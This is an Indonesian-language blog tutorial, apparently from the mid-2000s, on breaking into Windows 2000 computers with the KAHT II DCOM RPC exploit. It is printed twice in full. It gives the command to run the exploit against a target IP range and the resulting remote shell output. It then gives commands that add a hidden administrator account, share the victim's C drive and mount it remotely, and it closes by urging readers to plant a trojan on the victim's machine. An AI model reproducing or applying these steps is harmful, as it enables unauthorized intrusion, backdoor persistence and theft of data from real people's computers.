Yang dimaksud DCOM exploit disini adalah kaht,Langkah pertama yaitu download program kaht ii terlebih dahulu (search pakek google) letakkan di directory sesuai dengan keinginan anda, biasanya bentuk file dalam Zip coba extract file tersebut setelah ter exstrack kaht bisa digunakan.
Selanjutnya tentukan alamat ip target misal : 192.168.0.12
selanjutnya : Kaht 192.168.0.11 192.168.0.12
keterangan :
192.168.0.11 adalah IP (komputer tagret) awal
192.168.1.12 adalak IP (komputer target) akhir
karena disinia kita akan mengexploitasi ip 192.168.0.12 kita gunakan kaht 192.168.0.11 192.168.0.12 karena ip 192.168.0.11 merupakan range terkecil agar exploitasi berjalan lebih cepat sesuai dengan target kita.
Jika komputer target berhasil di exploitasi maka akan muncul akan muncul tampilan kurang lebih sebagai berikut :
------------------------------------------------------------ ----
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION
AUTOHACKING
------------------------------------------------------------ ----
[+] Targets : 192.168.0.11-192.168.0.12 eith 50 Threads
[+] Attacking Port. Remote Shell At ports: 36388
[+] Scan in Progress....
- Connecting to 192.168.0.12
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.
c:\WINNT\system32>
Sampai disini kita sudah berhasil masuk ke komputer target dan kita berada di directory kerja c:\WINNT\system32>
Sampai disini terserah anda mau malkukan apapun, sesuai keinginan anda disini kita akan coba malakuakn sharing file dan membuka file sharingan tersebut di komputer kita dengan terlebih dahulu menambahkan user ID setingkat administrator.
Untuk melakukan penambahan user di pc Target
C:WINNTsystem32>net user paluared suck /add
^ ^
nama_user password_user
net user paluared suck /add
The command completed successfully.
ket : disini kita menggunakan perintah net user nama_user password_user /add berdasarkan perintah diatas kita menambahkan user paluared dengan password suck, setelah user berhasil dibuat selanjutnya kita memberikan autority pada user paluared dalam groups administrator
C:\WINNT\system32>net localgroup Administrators paluared /add
^ ^
nama_group nama_user_baru
net localgroup Administrators paluared /add
The command completed successfully.
ket : di atas kita menggunakan perinta net localgroup Nama_gorups nama_user /add berdasarkan perintah diatas net localgroup berarti kita menambahkan user paluared kedalam groups daministrator pada kumputer local (komputer target), administrators adalah grups dari administrator tersebut dan untuk paluared adalah nama user yg ditambahkan dalam gruop
administrator.
setelah masuk coba lo buat user groups administrator
C:WINNTsystem32>net user paluared such /add
^ ^
user password
setelah itu masukan user paluared ke groups administrator
C:WINNTsystem32>net localgroup Administrators paluared /add
setelah itu sharing drive-nya
C:WINNTsystem32>net share c=c:
catatan user id nya terserah lo kasih apa sesuai keinginana lo..
oh ya
untuk menggunakan sharing drive tersebut bisa gunakan perintah net use
pertama buka dos promt baru di komputer kita selanjutnya ketik berikut:
c:> net use * \\ip_address\drive_c * /u:paluared
Type the password for \\ip_addres\C: <--- masukan password disini
ket : berdasarkan perintah diatas IP_address adalh IP komputer target dan drive_c adalah nama sharing drive dari komputer taget dan untuk u:/paluared bahwa kita masuk dengan menggunakan
user paluared (biasanya di dalam winxp/win2000 terdapat sharing
defaultnya yaitu C$, d$ dst, jika ini sang admin belum merubah hal tersebut kita dapat langsung melakukan net use atau tanpa malukan net share berdasarkan default sharing ini )
cat IP-Addres bisa juga di isi dengan nama computer
untuk keterangan nya lo bisa baca manualnya net use /?
setelah berhasil bisa liat di windows explorer
C:\WINNT\system32>net share drive_c=c:
^ ^
nama_sharing drive_sharing
net share Drive_c=c:c was shared successfully.
ket : berdasarkan perintah diatas kita melakukan telah sharing drive yaitu drive C dengan memberikan nama drive_C
TAMBAHAN : JIKA KITA SUDAH BERHASIL MELAKUKAN SEPERTI APA YANG DILAKUKAN DIATAS MAKA UNTUK SELANJUTNYA ANDA BISA BERKREASI SENDIRI DENGAN APA YANG ADA DI PIKIRAN ANDA.......
CONTOHNYA : KIRIMKAN FILE TROJAN, DAN KEMUDIAN JALANKAN HANYA DENGAN MEMANGGIL FILE TERSEBUT.....
DAN JIKA FILE TROJAN SUDAH AKTIF, MAKA JALANKAN CLIENT TROJAN TERSEBUT... DAN JIKA SUDAH.....
SELAMAT........ KOMPUTER KORBAN SUDAH MENJADI KEKUASAAN ANDA.
Selanjutnya tentukan alamat ip target misal : 192.168.0.12
selanjutnya : Kaht 192.168.0.11 192.168.0.12
keterangan :
192.168.0.11 adalah IP (komputer tagret) awal
192.168.1.12 adalak IP (komputer target) akhir
karena disinia kita akan mengexploitasi ip 192.168.0.12 kita gunakan kaht 192.168.0.11 192.168.0.12 karena ip 192.168.0.11 merupakan range terkecil agar exploitasi berjalan lebih cepat sesuai dengan target kita.
Jika komputer target berhasil di exploitasi maka akan muncul akan muncul tampilan kurang lebih sebagai berikut :
------------------------------------------------------------ ----
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION
AUTOHACKING------------------------------------------------------------ ----
[+] Targets : 192.168.0.11-192.168.0.12 eith 50 Threads
[+] Attacking Port. Remote Shell At ports: 36388
[+] Scan in Progress....
- Connecting to 192.168.0.12
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
c:\WINNT\system32>
Sampai disini kita sudah berhasil masuk ke komputer target dan kita berada di directory kerja c:\WINNT\system32>
Sampai disini terserah anda mau malkukan apapun, sesuai keinginan anda disini kita akan coba malakuakn sharing file dan membuka file sharingan tersebut di komputer kita dengan terlebih dahulu menambahkan user ID setingkat administrator.
Untuk melakukan penambahan user di pc Target
C:WINNTsystem32>net user paluared suck /add
^ ^
nama_user password_user
net user paluared suck /add
The command completed successfully.
ket : disini kita menggunakan perintah net user nama_user password_user /add berdasarkan perintah diatas kita menambahkan user paluared dengan password suck, setelah user berhasil dibuat selanjutnya kita memberikan autority pada user paluared dalam groups administrator
C:\WINNT\system32>net localgroup Administrators paluared /add
^ ^
nama_group nama_user_baru
net localgroup Administrators paluared /add
The command completed successfully.
ket : di atas kita menggunakan perinta net localgroup Nama_gorups nama_user /add berdasarkan perintah diatas net localgroup berarti kita menambahkan user paluared kedalam groups daministrator pada kumputer local (komputer target), administrators adalah grups dari administrator tersebut dan untuk paluared adalah nama user yg ditambahkan dalam gruop
administrator.
setelah masuk coba lo buat user groups administrator
C:WINNTsystem32>net user paluared such /add
^ ^
user password
setelah itu masukan user paluared ke groups administrator
C:WINNTsystem32>net localgroup Administrators paluared /add
setelah itu sharing drive-nya
C:WINNTsystem32>net share c=c:
catatan user id nya terserah lo kasih apa sesuai keinginana lo..
oh ya
untuk menggunakan sharing drive tersebut bisa gunakan perintah net use
pertama buka dos promt baru di komputer kita selanjutnya ketik berikut:
c:> net use * \\ip_address\drive_c * /u:paluared
Type the password for \\ip_addres\C: <--- masukan password disini
ket : berdasarkan perintah diatas IP_address adalh IP komputer target dan drive_c adalah nama sharing drive dari komputer taget dan untuk u:/paluared bahwa kita masuk dengan menggunakan
user paluared (biasanya di dalam winxp/win2000 terdapat sharing
defaultnya yaitu C$, d$ dst, jika ini sang admin belum merubah hal tersebut kita dapat langsung melakukan net use atau tanpa malukan net share berdasarkan default sharing ini )
cat IP-Addres bisa juga di isi dengan nama computer
untuk keterangan nya lo bisa baca manualnya net use /?
setelah berhasil bisa liat di windows explorer
C:\WINNT\system32>net share drive_c=c:
^ ^
nama_sharing drive_sharing
net share Drive_c=c:c was shared successfully.
ket : berdasarkan perintah diatas kita melakukan telah sharing drive yaitu drive C dengan memberikan nama drive_C
TAMBAHAN : JIKA KITA SUDAH BERHASIL MELAKUKAN SEPERTI APA YANG DILAKUKAN DIATAS MAKA UNTUK SELANJUTNYA ANDA BISA BERKREASI SENDIRI DENGAN APA YANG ADA DI PIKIRAN ANDA.......
CONTOHNYA : KIRIMKAN FILE TROJAN, DAN KEMUDIAN JALANKAN HANYA DENGAN MEMANGGIL FILE TERSEBUT.....
DAN JIKA FILE TROJAN SUDAH AKTIF, MAKA JALANKAN CLIENT TROJAN TERSEBUT... DAN JIKA SUDAH.....
SELAMAT........ KOMPUTER KORBAN SUDAH MENJADI KEKUASAAN ANDA.
Tidak ada komentar:
Posting Komentar